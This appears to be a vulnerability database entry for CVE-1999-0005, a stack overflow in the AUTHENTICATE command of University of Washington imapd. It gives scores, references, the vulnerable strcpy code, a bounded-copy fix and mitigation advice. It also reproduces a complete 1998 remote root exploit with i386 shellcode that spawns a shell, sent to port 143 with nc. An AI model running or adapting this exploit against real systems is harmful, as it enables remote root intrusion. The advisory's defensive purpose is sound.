CVE-1999-0005
CVSS 10.0
Published: 1998-07-20 00:00:00
Revised: 2008-09-09 08:33:31

[Original] Arbitrary command execution via IMAP buffer overflow in authenticate command.


[CNNVD] University of Washington imapd Remote Buffer Overflow Vulnerability (CNNVD-199807-024)

University of Washington imapd is an open-source implementation of the Internet Message Access Protocol.
A buffer overflow in the IMAP AUTHENTICATE command allows arbitrary command execution.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:university_of_washington:imap:10.234
cpe:/a:netscape:messaging_server:3.55 (Netscape Messaging Server 3.55)

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0005
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199807-024
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/130
(UNKNOWN)  BID  130
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/177
(UNKNOWN)  SUN  00177

- Vulnerability Information

University of Washington imapd Remote Buffer Overflow Vulnerability
Critical  Other
1998-07-20 00:00:00  2012-11-28 00:00:00
Remote
University of Washington imapd is an open-source implementation of the Internet Message Access Protocol.
A buffer overflow in the IMAP AUTHENTICATE command allows arbitrary command execution.

- Advisories and Patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily stop the imapd service.
Vendor patch:
University of Washington
------------------------
The vendor has not yet provided a patch or upgrade; users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.washington.edu/imap/

- Vulnerability Information (19107)

Netscape Messaging Server 3.55, University of Washington imapd 10.234 Buffer Overflow Vulnerability (EDBID:19107)
linux remote
1998-07-17 Verified
Anonymous
source: http://www.securityfocus.com/bid/130/info

A vulnerability exists in certain imapd implementations that allows an attacker to execute arbitrary code remotely. In certain instances, the code will run with root privilege.

IMAP supports a command 'AUTHENTICATE' which specifies the type of authentication mechanism to be used to open a mailbox. The value passed to the AUTHENTICATE command is copied into a buffer of size 1024. The maximum size of this value, however, is 8192 characters. A failure to bound the copied value to 1024 results in a buffer overflow.

The code which creates this problem is as follows:

char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[])
{
  char tmp[MAILTMPLEN];
  AUTHENTICATOR *auth;
  /* make upper case copy of mechanism name */
  ucase (strcpy (tmp,mechanism));
  for (auth = mailauthenticators; auth; auth = auth->next)
    if (auth->server && !strcmp (auth->name,tmp))
      return (*auth->server) (resp,argc,argv);
  return NIL; /* no authenticator found */
}

The 'strcpy' call on the sixth line of the code above copies the value of 'mechanism', which may be up to 8192 characters, into the 'tmp' buffer, which is only 1024 characters.

All versions of UW imapd up to and including 10.234 should be considered vulnerable.
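As an added example (not UW imapd's own code, nor part of the original advisory), here is the lookup above rewritten with a bounded copy, so a mechanism argument longer than the 1024-byte tmp[] is rejected instead of overwriting the stack. It assumes MAILTMPLEN is 1024 as stated on the page, and uses a minimal stand-in AUTHENTICATOR struct and list rather than the real c-client definitions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAILTMPLEN 1024   /* size of tmp[] in the original mail_auth() */

/* Minimal stand-in for UW imapd's authenticator list (constructed here;
 * the real AUTHENTICATOR struct also carries client/server callbacks). */
typedef struct authenticator {
    const char *name;
    struct authenticator *next;
} AUTHENTICATOR;
static AUTHENTICATOR auth_login = { "LOGIN", NULL };
static AUTHENTICATOR *mailauthenticators = &auth_login;

static void ucase(char *s)
{
    for (; *s; s++) *s = (char)toupper((unsigned char)*s);
}

/* Hardened replacement for the vulnerable lookup: the original ran
 * ucase(strcpy(tmp, mechanism)) with no length check, so a mechanism
 * argument longer than MAILTMPLEN overwrote the stack beyond tmp[].
 * Here the length is measured with an upper bound, anything that would
 * not fit together with its NUL is rejected, and the copy is bounded.
 * Returns the canonical mechanism name, or NULL if unknown or rejected. */
const char *mail_auth_lookup(const char *mechanism)
{
    char tmp[MAILTMPLEN];
    AUTHENTICATOR *auth;
    size_t len = 0;
    while (len < MAILTMPLEN && mechanism[len] != '\0')
        len++;
    if (len >= MAILTMPLEN)             /* no NUL inside tmp's size: too long */
        return NULL;
    memcpy(tmp, mechanism, len + 1);   /* bounded copy, NUL included */
    ucase(tmp);
    for (auth = mailauthenticators; auth; auth = auth->next)
        if (strcmp(auth->name, tmp) == 0)
            return auth->name;
    return NULL;                       /* no authenticator found */
}

int main(void)
{
    static char big[8192];             /* constructed 8191-byte argument */
    memset(big, 'A', sizeof big - 1);
    printf("login -> %s\n", mail_auth_lookup("login") ? "LOGIN" : "(rejected)");
    printf("8191 x 'A' -> %s\n", mail_auth_lookup(big) ? "match" : "(rejected)");
    return 0;
}
```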

/**
 *** i386 BSD remote root exploit for UW imapd IMAP 4.1 server
 ***
 *** This is *not* the same bug addressed in CERT Advisory CA-97.09!
 ***
 *** Usage: % (imappy nop esp offset; cat) | nc hostname 143
 ***
 *** where nop is the number of NOP opcodes to place at the start of the
 *** exploit buffer (I use 403), esp is the %esp stack pointer value, and
 *** offset is the number of bytes to add to esp to calculate your target
 *** %eip.
 ***
 *** Demonstration values for UW imapd 10.234 (part of Pine 4.00):
 ***
 *** imappy 403 0xefbfd5e8 100 (BSDI 3.0)
 *** imappy 403 0xefbfd4b8 100 (FreeBSD 2.2.5)
 ***
 *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
 ***
 *** Cheez Whiz
 *** cheezbeast@hotmail.com
 ***
 *** July 16, 1998
 **/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)
#define NOP 0x90

char shell[] =
  /* 0 */ "\xeb\x34" /* jmp springboard */
  /* start: */
  /* 2 */ "\x5e" /* popl %esi */
  /* 3 */ "\x8d\x1e" /* leal (%esi),%ebx */
  /* 5 */ "\x89\x5e\x0b" /* movl %ebx,0xb(%esi) */
  /* 8 */ "\x31\xd2" /* xorl %edx,%edx */
  /* 10 */ "\x89\x56\x07" /* movl %edx,0x7(%esi) */
  /* 13 */ "\x89\x56\x0f" /* movl %edx,0xf(%esi) */
  /* 16 */ "\x89\x56\x14" /* movl %edx,0x14(%esi) */
  /* 19 */ "\x88\x56\x19" /* movb %dl,0x19(%esi) */
  /* 22 */ "\x31\xc0" /* xorl %eax,%eax */
  /* 24 */ "\xb0\x7f" /* movb $0x7f,%al */
  /* 26 */ "\x20\x46\x01" /* andb %al,0x1(%esi) */
  /* 29 */ "\x20\x46\x02" /* andb %al,0x2(%esi) */
  /* 32 */ "\x20\x46\x03" /* andb %al,0x3(%esi) */
  /* 35 */ "\x20\x46\x05" /* andb %al,0x5(%esi) */
  /* 38 */ "\x20\x46\x06" /* andb %al,0x6(%esi) */
  /* 41 */ "\xb0\x3b" /* movb $0x3b,%al */
  /* 43 */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
  /* 46 */ "\x89\xca" /* movl %ecx,%edx */
  /* 48 */ "\x52" /* pushl %edx */
  /* 49 */ "\x51" /* pushl %ecx */
  /* 50 */ "\x53" /* pushl %ebx */
  /* 51 */ "\x50" /* pushl %eax */
  /* 52 */ "\xeb\x18" /* jmp exec */
  /* springboard: */
  /* 54 */ "\xe8\xc7\xff\xff\xff" /* call start */
  /* data: */
  /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8" /* DATA (disguised /bin/sh) */
  /* 66 */ "\x01\x01\x01\x01" /* DATA */
  /* 70 */ "\x02\x02\x02\x02" /* DATA */
  /* 74 */ "\x03\x03\x03\x03" /* DATA */
  /* exec: */
  /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0 */

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

void
main (int argc, char *argv[])
{
  int i;

  if (argc < 4) {
    printf("usage: %s nop esp offset\n", argv[0]);
    return;
  }

  nop = strtoul(argv[1], NULL, 0);
  esp = strtoul(argv[2], NULL, 0);
  offset = strtol(argv[3], NULL, 0);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+nop, shell, strlen(shell));
  for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
    *((int *) &buf[i]) = esp + offset;

  printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);
  printf("\r\n");

  return;
}

- Vulnerability Information

911
UoW imapd AUTHENTICATE Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

A remote overflow exists in the University of Washington IMAP server. The IMAP server fails to validate the argument passed to the AUTHENTICATE command resulting in a stack overflow. With a specially crafted request, an attacker can gain remote root privileges resulting in a loss of integrity.

- Timeline

1998-07-17 Unknown
1998-07-17 Unknown

- Solution

Upgrade to version 12.264 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

Unknown or Incomplete